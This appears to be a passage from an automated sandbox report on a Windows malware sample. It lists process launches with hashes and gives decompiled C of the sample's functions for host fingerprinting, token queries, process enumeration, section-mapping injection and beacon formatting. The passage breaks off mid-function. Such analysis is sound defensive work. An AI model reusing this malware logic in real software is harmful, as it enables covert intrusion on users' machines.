                          File size:117760 bytes
                          MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Start time:10:34:38
                          Start date:14/12/2021
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B16.tmp" "c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP"
                          Imagebase:0x7ff62ec30000
                          File size:47280 bytes
                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Start time:10:34:39
                          Start date:14/12/2021
                          Path:C:\Windows\System32\rundll32.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                          Imagebase:0x7ff6d6300000
                          File size:69632 bytes
                          MD5 hash:73C519F050C20580F8A62C849D49215A
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Disassembly

                          Code Analysis


                            Executed Functions

                            C-Code - Quality: 96%
                            			E00F1A303(char __eax, signed int* __esi) {
                            				long _v8;
                            				char _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int _v28;
                            				long _t34;
                            				signed int _t39;
                            				long _t50;
                            				char _t59;
                            				intOrPtr _t61;
                            				void* _t62;
                            				void* _t63;
                            				signed int* _t64;
                            				char _t65;
                            				intOrPtr* _t67;
                            				void* _t68;
                            				signed int* _t69;
                            
                            				_t69 = __esi;
                            				_t65 = __eax;
                            				_v8 = 0;
                            				_v12 = __eax;
                            				if(__eax == 0) {
                            					_t59 =  *0xf1d2a8; // 0xd448b889
                            					_v12 = _t59;
                            				}
                            				_t64 = _t69;
                            				E00F17855( &_v12, _t64);
                            				if(_t65 != 0) {
                            					 *_t69 =  *_t69 ^  *0xf1d2b4 ^ 0x46d76429;
                            				} else {
                            					GetUserNameW(0,  &_v8); // executed
                            					_t50 = _v8;
                            					if(_t50 != 0) {
                            						_t62 = RtlAllocateHeap( *0xf1d270, 0, _t50 + _t50);
                            						if(_t62 != 0) {
                            							if(GetUserNameW(_t62,  &_v8) != 0) {
                            								_t63 = _t62;
                            								 *_t69 =  *_t69 ^ E00F147A4(_v8 + _v8, _t63);
                            							}
                            							HeapFree( *0xf1d270, 0, _t62);
                            						}
                            					}
                            				}
                            				_t61 = __imp__;
                            				_v8 = _v8 & 0x00000000;
                            				GetComputerNameW(0,  &_v8);
                            				_t34 = _v8;
                            				if(_t34 != 0) {
                            					_t68 = RtlAllocateHeap( *0xf1d270, 0, _t34 + _t34);
                            					if(_t68 != 0) {
                            						if(GetComputerNameW(_t68,  &_v8) != 0) {
                            							_t63 = _t68;
                            							_t69[3] = _t69[3] ^ E00F147A4(_v8 + _v8, _t63);
                            						}
                            						HeapFree( *0xf1d270, 0, _t68);
                            					}
                            				}
                            				asm("cpuid");
                            				_t67 =  &_v28;
                            				 *_t67 = 1;
                            				 *((intOrPtr*)(_t67 + 4)) = _t61;
                            				 *(_t67 + 8) = _t63;
                            				 *(_t67 + 0xc) = _t64;
                            				_t39 = _v16 ^ _v20 ^ _v28;
                            				_t69[1] = _t69[1] ^ _t39;
                            				return _t39;
                            			}

                            APIs
                            • GetUserNameW.ADVAPI32(00000000,?), ref: 00F1A33A
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 00F1A351
                            • GetUserNameW.ADVAPI32(00000000,?), ref: 00F1A35E
                            • HeapFree.KERNEL32(00000000,00000000), ref: 00F1A37F
                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00F1A3A6
                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00F1A3BA
                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00F1A3C7
                            • HeapFree.KERNEL32(00000000,00000000), ref: 00F1A3E5
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: HeapName$AllocateComputerFreeUser
                            • String ID:
                            • API String ID: 3239747167-0
                            • Opcode ID: f9ab61ce9f65d639f21bb9ceeb70b15fbe93a26478f92c075d9316164c8af52f
                            • Instruction ID: 84fa7b72fe7e570d0345824b8dfcb36a1c883fb732a8debb1516620fb3fad40b
                            • Opcode Fuzzy Hash: f9ab61ce9f65d639f21bb9ceeb70b15fbe93a26478f92c075d9316164c8af52f
                            • Instruction Fuzzy Hash: 0B311776A00209EFDB11DFA9DD81BAEB7F9FF48310F268029E415D2250E731ED41AB21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 38%
                            			E00F16C06(char _a4, void* _a8) {
                            				void* _v8;
                            				void* _v12;
                            				char _v16;
                            				void* _v20;
                            				char _v24;
                            				char _v28;
                            				char _v32;
                            				char _v36;
                            				char _v40;
                            				void* _v44;
                            				void** _t33;
                            				void* _t40;
                            				void* _t43;
                            				void** _t44;
                            				intOrPtr* _t47;
                            				char _t48;
                            
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				_v20 = _a4;
                            				_t48 = 0;
                            				_v16 = 0;
                            				_a4 = 0;
                            				_v44 = 0x18;
                            				_v40 = 0;
                            				_v32 = 0;
                            				_v36 = 0;
                            				_v28 = 0;
                            				_v24 = 0;
                            				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                            					_t33 =  &_v8;
                            					__imp__(_v12, 8, _t33);
                            					if(_t33 >= 0) {
                            						_t47 = __imp__;
                            						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                            						_t44 = E00F155DC(_a4);
                            						if(_t44 != 0) {
                            							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                            							if(_t40 >= 0) {
                            								memcpy(_a8,  *_t44, 0x1c);
                            								_t48 = 1;
                            							}
                            							E00F16DFA(_t44);
                            						}
                            						NtClose(_v8); // executed
                            					}
                            					NtClose(_v12);
                            				}
                            				return _t48;
                            			}

                            APIs
                            • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00F16C4D
                            • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 00F16C60
                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00F16C7C
                              • Part of subcall function 00F155DC: RtlAllocateHeap.NTDLL(00000000,00000000,00F1552C), ref: 00F155E8
                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00F16C99
                            • memcpy.NTDLL(?,00000000,0000001C), ref: 00F16CA6
                            • NtClose.NTDLL(?), ref: 00F16CB8
                            • NtClose.NTDLL(00000000), ref: 00F16CC2
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                            • String ID:
                            • API String ID: 2575439697-0
                            • Opcode ID: 1a7ec4ee030ef2cadfcd18797f72b5c9471f2817bdf5d409367d8c60afa2456e
                            • Instruction ID: c14a79fad556c897667a4ce0a335ba531eff86d193f45a6f79bf41cc9a15ff50
                            • Opcode Fuzzy Hash: 1a7ec4ee030ef2cadfcd18797f72b5c9471f2817bdf5d409367d8c60afa2456e
                            • Instruction Fuzzy Hash: C52114B294022CBBDB01AF95DC45ADEBFBDEF08750F104026F905F6220D7759A85ABE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 61%
                            			E00F13309() {
                            				char _v264;
                            				void* _v300;
                            				void* _t5;
                            				int _t8;
                            				intOrPtr _t9;
                            				int _t15;
                            				void* _t17;
                            
                            				_t15 = 0;
                            				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
                            				_t17 = _t5;
                            				if(_t17 != 0) {
                            					_t8 = Process32First(_t17,  &_v300);
                            					while(_t8 != 0) {
                            						_t9 =  *0xf1d2b8; // 0x48da5a8
                            						_push(_t9 + 0xf1ee88);
                            						_push( &_v264);
                            						if( *0xf1d110() != 0) {
                            							_t15 = 1;
                            						} else {
                            							_t8 = Process32Next(_t17,  &_v300);
                            							continue;
                            						}
                            						L7:
                            						CloseHandle(_t17);
                            						goto L8;
                            					}
                            					goto L7;
                            				}
                            				L8:
                            				return _t15;
                            			}

                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F13319
                            • Process32First.KERNEL32(00000000,?), ref: 00F1332C
                            • Process32Next.KERNEL32(00000000,?), ref: 00F13358
                            • CloseHandle.KERNEL32(00000000), ref: 00F13367
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                            • String ID:
                            • API String ID: 420147892-0
                            • Opcode ID: 96025c4186688e09db6411a9daabf89a3b9e9cdf2c30b2f80e312c1185548bc9
                            • Instruction ID: 167b2173b4ecb7e6bd75dc7e0d4eee405e3da785605ff23438f6dacdf2a5ff9e
                            • Opcode Fuzzy Hash: 96025c4186688e09db6411a9daabf89a3b9e9cdf2c30b2f80e312c1185548bc9
                            • Instruction Fuzzy Hash: C5F0BB729010286BE720A7669C49EEB77ACEBC5760F010051F969D3000EE64DBC6A6A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 21%
                            			E00F14638(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
                            				intOrPtr _v8;
                            				char _v12;
                            				signed int _t34;
                            				long _t36;
                            				long _t37;
                            				signed int _t38;
                            				intOrPtr _t39;
                            				signed int _t40;
                            				intOrPtr _t42;
                            				intOrPtr _t43;
                            				intOrPtr _t45;
                            				void* _t56;
                            				intOrPtr _t57;
                            				void* _t63;
                            				intOrPtr* _t65;
                            				intOrPtr* _t66;
                            				void* _t69;
                            
                            				_t66 = __esi;
                            				_t63 = E00F165F6(_t34, _a4);
                            				if(_t63 == 0) {
                            					L18:
                            					_t36 = GetLastError();
                            				} else {
                            					_t37 = GetVersion();
                            					_t69 = _t37 - 6;
                            					if(_t69 > 0 || _t69 == 0 && _t37 > 2) {
                            						_a4 = 4;
                            					} else {
                            						_a4 = 0;
                            					}
                            					__imp__(_t63, _a4, 0, 0, 0); // executed
                            					 *(_t66 + 0x10) = _t37;
                            					_t38 = E00F16DFA(_t63);
                            					if( *(_t66 + 0x10) == 0) {
                            						goto L18;
                            					} else {
                            						_t39 = E00F165F6(_t38,  *_t66);
                            						_v8 = _t39;
                            						if(_t39 == 0) {
                            							goto L18;
                            						} else {
                            							_t65 = __imp__; // 0x6ff6f5a0
                            							if(_a8 == 0) {
                            								L10:
                            								__imp__( *(_t66 + 0x10), _v8, 0x1bb, 0);
                            								 *((intOrPtr*)(_t66 + 0x14)) = _t39;
                            								_t40 = E00F16DFA(_v8);
                            								if( *((intOrPtr*)(_t66 + 0x14)) == 0) {
                            									goto L18;
                            								} else {
                            									_a4 = 0x800100;
                            									_t56 = E00F165F6(_t40,  *((intOrPtr*)(_t66 + 4)));
                            									if(_t56 == 0) {
                            										goto L18;
                            									} else {
                            										_t42 =  *0xf1d2b8; // 0x48da5a8
                            										_t43 = _t42 + 0xf1e758;
                            										__imp__( *((intOrPtr*)(_t66 + 0x14)), _t43, _t56, 0, 0, 0, _a4); // executed
                            										 *((intOrPtr*)(_t66 + 0x18)) = _t43;
                            										E00F16DFA(_t56);
                            										_t45 =  *((intOrPtr*)(_t66 + 0x18));
                            										if(_t45 == 0) {
                            											goto L18;
                            										} else {
                            											_t57 = 4;
                            											_v12 = _t57;
                            											__imp__(_t45, 0x1f,  &_a4,  &_v12);
                            											if(_t45 != 0) {
                            												_a4 = _a4 | 0x00000100;
                            												 *_t65( *((intOrPtr*)(_t66 + 0x18)), 0x1f,  &_a4, _t57);
                            											}
                            											_push(_t57);
                            											_push( &_a8);
                            											_push(6);
                            											_push( *((intOrPtr*)(_t66 + 0x18)));
                            											if( *_t65() == 0) {
                            												goto L18;
                            											} else {
                            												_push(_t57);
                            												_push( &_a8);
                            												_push(5);
                            												_push( *((intOrPtr*)(_t66 + 0x18)));
                            												if( *_t65() == 0) {
                            													goto L18;
                            												} else {
                            													_t36 = 0;
                            												}
                            											}
                            										}
                            									}
                            								}
                            							} else {
                            								_t39 =  *_t65( *(_t66 + 0x10), 3,  &_a8, 4);
                            								if(_t39 == 0) {
                            									goto L18;
                            								} else {
                            									goto L10;
                            								}
                            							}
                            						}
                            					}
                            				}
                            				return _t36;
                            			}
                            0x00f14638
                            0x00f14647
                            0x00f1464d
                            0x00f1477c
                            0x00f1477c
                            0x00f14653
                            0x00f14653
                            0x00f14659
                            0x00f1465b
                            0x00f14669
                            0x00f14664
                            0x00f14664
                            0x00f14664
                            0x00f14677
                            0x00f1467e
                            0x00f14681
                            0x00f14689
                            0x00000000
                            0x00f1468f
                            0x00f14691
                            0x00f14698
                            0x00f1469b
                            0x00000000
                            0x00f146a1
                            0x00f146a4
                            0x00f146aa
                            0x00f146c1
                            0x00f146cd
                            0x00f146d6
                            0x00f146d9
                            0x00f146e1
                            0x00000000
                            0x00f146e7
                            0x00f146ea
                            0x00f146f6
                            0x00f146fc
                            0x00000000
                            0x00f146fe
                            0x00f14701
                            0x00f1470a
                            0x00f14714
                            0x00f1471b
                            0x00f1471e
                            0x00f14723
                            0x00f14728
                            0x00000000
                            0x00f1472a
                            0x00f1472c
                            0x00f14738
                            0x00f1473b
                            0x00f14743
                            0x00f14745
                            0x00f14756
                            0x00f14756
                            0x00f14758
                            0x00f1475c
                            0x00f1475d
                            0x00f1475f
                            0x00f14766
                            0x00000000
                            0x00f14768
                            0x00f14768
                            0x00f1476c
                            0x00f1476d
                            0x00f1476f
                            0x00f14776
                            0x00000000
                            0x00f14778
                            0x00f14778
                            0x00f14778
                            0x00f14776
                            0x00f14766
                            0x00f14728
                            0x00f146fc
                            0x00f146ac
                            0x00f146b7
                            0x00f146bb
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f146bb
                            0x00f146aa
                            0x00f1469b
                            0x00f14689
                            0x00f14785

                            APIs
                              • Part of subcall function 00F165F6: lstrlen.KERNEL32(?,00000000,057F9B78,00000000,00F125B8,?,69B25F44,?,?,?,?,69B25F44,00000005,00F1D00C,?,?), ref: 00F165FD
                              • Part of subcall function 00F165F6: mbstowcs.NTDLL ref: 00F16626
                              • Part of subcall function 00F165F6: memset.NTDLL ref: 00F16638
                            • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,00F1572B,751881D0,00000000,057F9618,?,?,00F13B91,?,057F9618,0000EA60), ref: 00F14653
                            • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,00F1572B,751881D0,00000000,057F9618,?,?,00F13B91,?,057F9618,0000EA60), ref: 00F1477C
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                            • String ID:
                            • API String ID: 4097109750-0
                            • Opcode ID: dd98d11f30a27d7cb15c4cc259cd643ba2cfb114464abbe3e0376cefb68a6dea
                            • Instruction ID: fc40ecda38b2f84d58849119a23ee0dfed239286594572723cd682b32a05d1ae
                            • Opcode Fuzzy Hash: dd98d11f30a27d7cb15c4cc259cd643ba2cfb114464abbe3e0376cefb68a6dea
                            • Instruction Fuzzy Hash: C4416271500208FFEB219FA4CC89EEB7BBDEB49751F058529FA02D50A1D771E984AB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 72%
                            			E00F17562(intOrPtr* __eax, void** _a4) {
                            				int _v12;
                            				void* _v16;
                            				void* _v20;
                            				void* _v24;
                            				int _v28;
                            				int _v32;
                            				intOrPtr _v36;
                            				int _v40;
                            				int _v44;
                            				void* _v48;
                            				void* __esi;
                            				long _t34;
                            				void* _t39;
                            				void* _t47;
                            				intOrPtr* _t48;
                            
                            				_t48 = __eax;
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				_v24 =  *((intOrPtr*)(__eax + 4));
                            				_v16 = 0;
                            				_v12 = 0;
                            				_v48 = 0x18;
                            				_v44 = 0;
                            				_v36 = 0x40;
                            				_v40 = 0;
                            				_v32 = 0;
                            				_v28 = 0;
                            				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                            				if(_t34 < 0) {
                            					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                            				} else {
                            					 *_t48 = _v16;
                            					_t39 = E00F165B4(_t48,  &_v12); // executed
                            					_t47 = _t39;
                            					if(_t47 != 0) {
                            						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                            					} else {
                            						memset(_v12, 0, _v24);
                            						 *_a4 = _v12;
                            					}
                            				}
                            				return _t47;
                            			}
                            0x00f1756b
                            0x00f17572
                            0x00f17573
                            0x00f17574
                            0x00f17575
                            0x00f17576
                            0x00f17587
                            0x00f1758b
                            0x00f1759f
                            0x00f175a2
                            0x00f175a5
                            0x00f175ac
                            0x00f175af
                            0x00f175b6
                            0x00f175b9
                            0x00f175bc
                            0x00f175bf
                            0x00f175c4
                            0x00f175ff
                            0x00f175c6
                            0x00f175c9
                            0x00f175cf
                            0x00f175d4
                            0x00f175d8
                            0x00f175f6
                            0x00f175da
                            0x00f175e1
                            0x00f175ef
                            0x00f175ef
                            0x00f175d8
                            0x00f17607

                            APIs
                            • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,00F16DA4), ref: 00F175BF
                              • Part of subcall function 00F165B4: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00F175D4,00000002,00000000,?,?,00000000,?,?,00F175D4,00000000), ref: 00F165E1
                            • memset.NTDLL ref: 00F175E1
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: Section$CreateViewmemset
                            • String ID:
                            • API String ID: 2533685722-0
                            • Opcode ID: 7b17b77b2f6c88aa2ae40b1cc99be76bae56fb1d76c391742396b67112d96bb9
                            • Instruction ID: 8435ec92719d4932c09db7fb890cc7ace6aa7e599cba0b42fccc9ba68fbc4737
                            • Opcode Fuzzy Hash: 7b17b77b2f6c88aa2ae40b1cc99be76bae56fb1d76c391742396b67112d96bb9
                            • Instruction Fuzzy Hash: 15211DB6D00209AFDB11DFA9C8849DEFBBAFF48354F104429E505F3210D735AA449BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00F13A79(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                            				struct _FILETIME _v12;
                            				signed int _t11;
                            				void* _t15;
                            				void* _t20;
                            				void* _t22;
                            				void* _t23;
                            				signed short* _t24;
                            
                            				_t22 = __edx;
                            				_t23 = E00F165F6(_t11, _a12);
                            				if(_t23 == 0) {
                            					_t20 = 8;
                            				} else {
                            					_t24 = _t23 + _a16 * 2;
                            					 *_t24 =  *_t24 & 0x00000000; // executed
                            					_t15 = E00F16B4F(__ecx, _a4, _a8, _t23); // executed
                            					_t20 = _t15;
                            					if(_t20 == 0) {
                            						GetSystemTimeAsFileTime( &_v12);
                            						 *_t24 = 0x5f;
                            						_t20 = E00F16E41(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8);
                            					}
                            					HeapFree( *0xf1d270, 0, _t23);
                            				}
                            				return _t20;
                            			}
                            0x00f13a79
                            0x00f13a8a
                            0x00f13a8e
                            0x00f13ae7
                            0x00f13a90
                            0x00f13a97
                            0x00f13a9d
                            0x00f13aa1
                            0x00f13aa6
                            0x00f13aaa
                            0x00f13ab0
                            0x00f13ac0
                            0x00f13ad2
                            0x00f13ad2
                            0x00f13add
                            0x00f13add
                            0x00f13aee

                            APIs
                              • Part of subcall function 00F165F6: lstrlen.KERNEL32(?,00000000,057F9B78,00000000,00F125B8,?,69B25F44,?,?,?,?,69B25F44,00000005,00F1D00C,?,?), ref: 00F165FD
                              • Part of subcall function 00F165F6: mbstowcs.NTDLL ref: 00F16626
                              • Part of subcall function 00F165F6: memset.NTDLL ref: 00F16638
                            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000014,00000000,00000008,00000000,75145520,00000008,00000014,?,057F93AC), ref: 00F13AB0
                            • HeapFree.KERNEL32(00000000,00000000,?,00000014,00000000,00000008,00000000,75145520,00000008,00000014,?,057F93AC), ref: 00F13ADD
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                            • String ID:
                            • API String ID: 1500278894-0
                            • Opcode ID: e5ae4a83579499f411610d5dd1e95a77b9b5b537e79d1e9ca043ffb29404acd1
                            • Instruction ID: 552e1d84f673b1a502428bec1bdb43f96268c357045dca68c538a396579321e4
                            • Opcode Fuzzy Hash: e5ae4a83579499f411610d5dd1e95a77b9b5b537e79d1e9ca043ffb29404acd1
                            • Instruction Fuzzy Hash: EA014B36600209BBDB216FA8DC45EDB7FB9FF84710F108025FA4096161EB76D9A8E760
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 68%
                            			E00F165B4(void** __esi, PVOID* _a4) {
                            				long _v8;
                            				void* _v12;
                            				void* _v16;
                            				long _t13;
                            
                            				_v16 = 0;
                            				asm("stosd");
                            				_v8 = 0;
                            				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                            				if(_t13 < 0) {
                            					_push(_t13);
                            					return __esi[6]();
                            				}
                            				return 0;
                            			}
                            0x00f165c6
                            0x00f165cc
                            0x00f165da
                            0x00f165e1
                            0x00f165e6
                            0x00f165ec
                            0x00000000
                            0x00f165ed
                            0x00000000

                            APIs
                            • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00F175D4,00000002,00000000,?,?,00000000,?,?,00F175D4,00000000), ref: 00F165E1
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: SectionView
                            • String ID:
                            • API String ID: 1323581903-0
                            • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                            • Instruction ID: 0154ff5aaf0cd0d5a2c7495ee2e0aab45ce5a3a371dd93172d69a7c947a0c9da
                            • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                            • Instruction Fuzzy Hash: ADF01CB690020CBFEB119FA5CC85DAFBBBDEB44394B104979B152E1094D631AE489A60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 63%
                            			E00F16367(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a16, void* _a24, intOrPtr _a32, void* _a40) {
                            				void* _v0;
                            				intOrPtr _v4;
                            				intOrPtr _v12;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				intOrPtr _v32;
                            				void* _v48;
                            				intOrPtr _v52;
                            				void* __edi;
                            				long _t30;
                            				intOrPtr _t31;
                            				intOrPtr _t32;
                            				intOrPtr _t33;
                            				intOrPtr _t34;
                            				intOrPtr _t35;
                            				void* _t38;
                            				intOrPtr _t39;
                            				int _t42;
                            				intOrPtr _t43;
                            				intOrPtr _t44;
                            				intOrPtr _t46;
                            				void* _t49;
                            				intOrPtr _t53;
                            				intOrPtr _t57;
                            				intOrPtr* _t59;
                            				void* _t60;
                            				intOrPtr _t65;
                            				intOrPtr _t71;
                            				intOrPtr _t74;
                            				intOrPtr _t78;
                            				int _t81;
                            				void* _t83;
                            				void* _t84;
                            				void* _t88;
                            				intOrPtr _t90;
                            				long _t92;
                            				intOrPtr* _t93;
                            				intOrPtr* _t94;
                            				int _t95;
                            				void* _t96;
                            				void* _t97;
                            				void* _t100;
                            				void* _t102;
                            
                            				_t88 = __edx;
                            				_t84 = __ecx;
                            				_t30 = __eax;
                            				_t100 =  &_v12;
                            				_t83 = _a16;
                            				_v4 = 8;
                            				if(__eax == 0) {
                            					_t30 = GetTickCount();
                            				}
                            				_t31 =  *0xf1d018; // 0xad359284
                            				asm("bswap eax");
                            				_t32 =  *0xf1d014; // 0x3a87c8cd
                            				asm("bswap eax");
                            				_t33 =  *0xf1d010; // 0xd8d2f808
                            				asm("bswap eax");
                            				_t34 =  *0xf1d00c; // 0x8f8f86c2
                            				asm("bswap eax");
                            				_t35 =  *0xf1d2b8; // 0x48da5a8
                            				_t95 = wsprintfA(_t83, _t35 + 0xf1e633, 2, 0x3f87e, _t34, _t33, _t32, _t31,  *0xf1d02c,  *0xf1d004, _t30);
                            				_t38 = E00F18DA6();
                            				_t39 =  *0xf1d2b8; // 0x48da5a8
                            				_t42 = wsprintfA(_t95 + _t83, _t39 + 0xf1e673, _t38);
                            				_t102 = _t100 + 0x38;
                            				_t96 = _t95 + _t42; // executed
                            				_t43 = E00F140AC(_t84); // executed
                            				_a32 = _t43;
                            				if(_t43 != 0) {
                            					_t78 =  *0xf1d2b8; // 0x48da5a8
                            					_t81 = wsprintfA(_t96 + _t83, _t78 + 0xf1e8b2, _t43);
                            					_t102 = _t102 + 0xc;
                            					_t96 = _t96 + _t81;
                            					HeapFree( *0xf1d270, 0, _a40);
                            				}
                            				_t44 = E00F18941();
                            				_a32 = _t44;
                            				if(_t44 != 0) {
                            					_t74 =  *0xf1d2b8; // 0x48da5a8
                            					wsprintfA(_t96 + _t83, _t74 + 0xf1e885, _t44);
                            					HeapFree( *0xf1d270, 0, _a40);
                            				}
                            				_t90 =  *0xf1d35c; // 0x57f95b0
                            				_t46 = E00F13FB8(0xf1d00a, _t90 + 4);
                            				_t92 = 0;
                            				_a8 = _t46;
                            				if(_t46 != 0) {
                            					_t49 = RtlAllocateHeap( *0xf1d270, 0, 0x800); // executed
                            					_a24 = _t49;
                            					if(_t49 != 0) {
                            						E00F147EF(GetTickCount());
                            						_t53 =  *0xf1d35c; // 0x57f95b0
                            						__imp__(_t53 + 0x40);
                            						asm("lock xadd [eax], ecx");
                            						_t57 =  *0xf1d35c; // 0x57f95b0
                            						__imp__(_t57 + 0x40);
                            						_t59 =  *0xf1d35c; // 0x57f95b0
                            						_t60 = E00F1A7FB(1, _t88, _t83,  *_t59); // executed
                            						_t97 = _t60;
                            						asm("lock xadd [eax], ecx");
                            						if(_t97 != 0) {
                            							StrTrimA(_t97, 0xf1c2ac);
                            							_push(_t97);
                            							_t65 = E00F16F6D();
                            							_v20 = _t65;
                            							if(_t65 != 0) {
                            								_t93 = __imp__;
                            								 *_t93(_t97, _v0);
